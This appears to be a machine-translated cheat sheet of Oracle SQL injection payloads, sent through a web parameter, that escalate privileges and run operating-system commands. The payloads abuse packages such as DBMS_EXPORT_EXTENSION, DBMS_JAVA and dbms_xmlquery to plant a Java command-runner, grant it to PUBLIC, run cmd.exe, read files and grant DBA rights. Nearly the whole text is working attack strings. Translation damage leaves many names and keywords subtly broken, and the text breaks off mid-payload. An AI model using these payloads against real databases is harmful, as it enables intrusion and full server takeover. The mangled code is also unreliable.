Summary of oracle blind injection error statements and oracle Elevation of Privilege statements

And (select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" begin dbms_java.grant_permission ("PUBLIC", "SYS: java. io. filePermission "," <> "," execute "); end;"; END; -', 'sys', 0, '1', 0) from dual) is not null-
 
Create $ Functio
 
Http: // ooo/1.jsp? 1 = String ''and (select
 
SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT"
 
. PUT (: P1); EXECUTE IMMEDIATE
 
"Declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" create
 
Or replace function LinxRunCMD (p_cmd in
Varchar2) return varchar2 as language java name
 
"LinxUtil. runCMD (java. lang. String) return String """";
 
"; END;-', 'sys', 0, '1', 0) from dual) is not null-
 
Grant $ function $ execute $ Privilege
 
Http: // ooo/1.jsp? 1 = String ''and (select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" grant all on LinxRunCMD to public "; END;-', 'sy ', 0, '1', 0) from dual) is not null-
 
Execute $ OS $ Code
 
Http: // ooo/1.jsp? 1 = String ''and (select sys.linxrunner('cmd.exe/c whoam') from dual) is not null-
 
Java permission
 
Affected Systems: 10g R2, 11g R1 and 11g R2
 
A) DBMS_JAVA.RUNJAV
 
Affected Systems: 11gR1, 11gR2
 
Http: // ooo/1.jsp? 1 = String ''and (SELECT DBMS_JAVA.RUNJAVA ('oracle/aurora/util/Wrapper c: \ windows \ system32 \ cmd.exe/c dir> C :\\ OUT. lst') from dual) is not null-
 
B) DBMS_JAVA_TEST.FUNCAL
 
Affected Systems: 10g R2, 11g R1, 11g R2
 
Http: // ooo/1.jsp? 1 = String ''and (Select DBMS_JAVA_TEST.FUNCALL ('oracle/aurora/util/wrapper', 'main', 'c: \ windows \ system32 \ cmd.exe ', '/C', 'dir> c: \ OUT2.LST') from dual) is not null-
 
DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
 
Affected Systems: Oracle 8, 9, 10g R1, 10g R2, 11g R1
 
-
 
1. Create Library
 
Http: // ooo/1.jsp? 1 = String ''and (select SYS. values (USER, 'validate _ GRP_OBJECTS_LOCAL (: canon_gname); execute immediate "declare pragma values; begin execute immediate" create or replace and compile java source named "LinxUtil" as import java. io. *; public class LinxUtil extends Object {public static String runCMD (String args) {try {BufferedReader myReader = new BufferedReader (n Ew inputstreamreader(runtime.getruntime(cmd.exe c (args). getInputStream (); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + "\ n"; myReader. close (); return str;} catch (Exception e) {returne. toString () ;}} public static String readFile (String filename) {try {BufferedReader myReader = new BufferedReader (new FileReader (filename); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + "\ n"; myReader. close (); return str;} catch (Exception e) {return e. toString () ;}}" "; END;-', 'ccccc') from dual) is not null-
 
2. Granting JAVA permissions
 
Http://www.bkjia.com/1.jsp? 1 = String ''and (select SYS. revoke (USER, 'validate _ GRP_OBJECTS_LOCAL (: canon_gname); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" create or replace function LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name "LinxUtil. runCMD (java. lang. string) return String "; END;-', 'ccccc') from dual) is not null-
 
3. Making function executable by PUBLIC
 
Http: // ooo/1.jsp? 1 = String ''and (select SYS. revoke (USER, 'validate _ GRP_OBJECTS_LOCAL (: canon_gname); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; beginexecute immediate" grant all on LinxRunCMD to public "; END; -', 'ccccc') from dual) is not null-
 
4. Executing OS Code
 
Http: // ooo/1.jsp? 1 = String ''and (select sys.linxrunner('cmd.exe/c whoam') from dual) is not null-
 
After patching: The create procedure permission is required.
 
1. Create Function
 
Http://www.bkjia.com/default. jsp? 1 = intenger and (select dbms_xmlquery.newcontext ('descare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate "create or replace function pwn2 return varchar2 authid current_user is PRAGMA autonomous_transaction; BEGIN execute immediate "grant dba to scott"; commit; return "z"; END; "; commit; end; ') from dual) is not null-
 
2. Exploiting SYS. L
 
Http: // ooo/default. jsp? 1 = intenger and (select dbms_xmlquery.newcontext ('Clare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate "begin SYS. LT. CREATEWORKSPACE ("A10" and scott. pwn2 () = "x"); YS. LT. REMOVEWORKSPACE ("A10" and scott. pwn2 () = "x"); end; "; commit; end; ') from dual) is not null-
 
Let's look at CPU of October 2010 (vulnerable versions 10gR1, 10gR2, 11g R1 and 11gR2) and look at the vulnerability in package sys. dbms_cdc_publish.create_change_set which allows a user with EXECUTE_CATALOG_ROLE privilege to become DBA.
 
Http: // ooo/default. jsp? 1 = intenger and (select dbms_xmlquery.newcontext ('Clare PRAGMAAUTONOMOUS_TRANSACTION